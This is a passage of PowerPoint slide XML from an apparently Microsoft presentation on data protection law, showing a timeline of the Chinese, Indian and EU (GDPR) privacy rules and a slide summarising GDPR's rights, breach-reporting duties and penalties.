                <a:ea typeface="Segoe UI Black" panose="020B0A02040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>China:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2353" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="00188F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2353" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>May 31, 2017. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2353" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>New China Cybersecurity Law goes into effect.</a:t>
            </a:r>
          </a:p>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2745" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Light"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="749300" marR="0" lvl="2" indent="-19050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2745" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0078D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3136" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0078D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Black" panose="020B0A02040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>India: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2353" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>September 2017</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2745" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2353" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>India vows to implement a new “data protection law  that will set a global benchmark.”</a:t>
            </a:r>
          </a:p>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endParaRPr kumimoji="0" lang="en-US" sz="2745" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Light"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="784338" marR="0" lvl="3"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2745" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3136" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Black" panose="020B0A02040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EU:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2745" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2353" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>May 25, 2018</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2745" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2353" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>GDPR goes into effect.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2745" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>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2745" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2745" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2745" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2745" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Game changer.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9035916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27" y="974"/>
            <a:ext cx="12199053" cy="6856055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1730" y="974"/>
            <a:ext cx="12188542" cy="6856055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">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1" tIns="140528" rIns="175661" bIns="140528" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="89548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sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Providing clarity and consistency for the protection of personal data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="574896" y="2199488"/>
            <a:ext cx="376184" cy="364997"/>
            <a:chOff x="3257187" y="2110051"/>
            <a:chExt cx="376290" cy="595049"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="Straight Connector 12"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3263900" y="2114550"/>
              <a:ext cx="0" cy="5905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57187" y="2110051"/>
              <a:ext cx="3762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rot="10800000">
            <a:off x="6095641" y="5135278"/>
            <a:ext cx="376184" cy="364997"/>
            <a:chOff x="3257187" y="2110051"/>
            <a:chExt cx="376290" cy="595049"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="Straight Connector 15"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3263900" y="2114550"/>
              <a:ext cx="0" cy="5905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57187" y="2110051"/>
              <a:ext cx="3762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V="1">
            <a:off x="7174992" y="3101245"/>
            <a:ext cx="3382320" cy="1451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174994" y="2372285"/>
            <a:ext cx="4537469" cy="572302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182828" tIns="146263" rIns="182828" bIns="146263" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914049"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0078D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Enhanced</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> personal privacy rights</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7174993" y="3257554"/>
            <a:ext cx="5231709" cy="572302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182828" tIns="146263" rIns="182828" bIns="146263" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914049"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0078D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Increased</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> duty for protecting data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7174994" y="4142824"/>
            <a:ext cx="4062848" cy="572302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182828" tIns="146263" rIns="182828" bIns="146263" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914049"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0078D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Mandatory </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>breach reporting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Connector 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7174991" y="3977950"/>
            <a:ext cx="3382320" cy="1451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6921859" y="2543062"/>
            <a:ext cx="182828" cy="182828"/>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Oval 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6921859" y="3452865"/>
            <a:ext cx="182828" cy="182828"/>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Oval 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6921859" y="4313881"/>
            <a:ext cx="182828" cy="182828"/>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2" name="Straight Connector 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7174991" y="4863219"/>
            <a:ext cx="3382320" cy="1451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74992" y="5055305"/>
            <a:ext cx="5042466" cy="572342"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182828" tIns="146263" rIns="182828" bIns="146263" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914049"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0078D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Significant </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>penalties</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0078D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>for non-compliance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Oval 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6921859" y="5226362"/>
            <a:ext cx="182828" cy="182828"/>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TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645199" y="2299338"/>
            <a:ext cx="5749606" cy="3120962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="179234" tIns="143387" rIns="179234" bIns="143387" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0078D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>General Data Protection Regulation</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFB903"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(GDPR) </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>imposes new rules on organizations that offer goods and services to people in the European Union (EU), or that collect and analyze data tied to EU residents, no matter where they’re located</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{041EDE68-9875-47DC-A43A-5E7A6C964FCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213971" y="6111690"/>
            <a:ext cx="10361672" cy="360959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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600" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft believes the GDPR is an important step forward for clarifying and enabling individual privacy rights</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41929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0" y="974"/>
            <a:ext cx="12188543" cy="6856055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1730" y="974"/>
            <a:ext cx="12188541" cy="6856055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
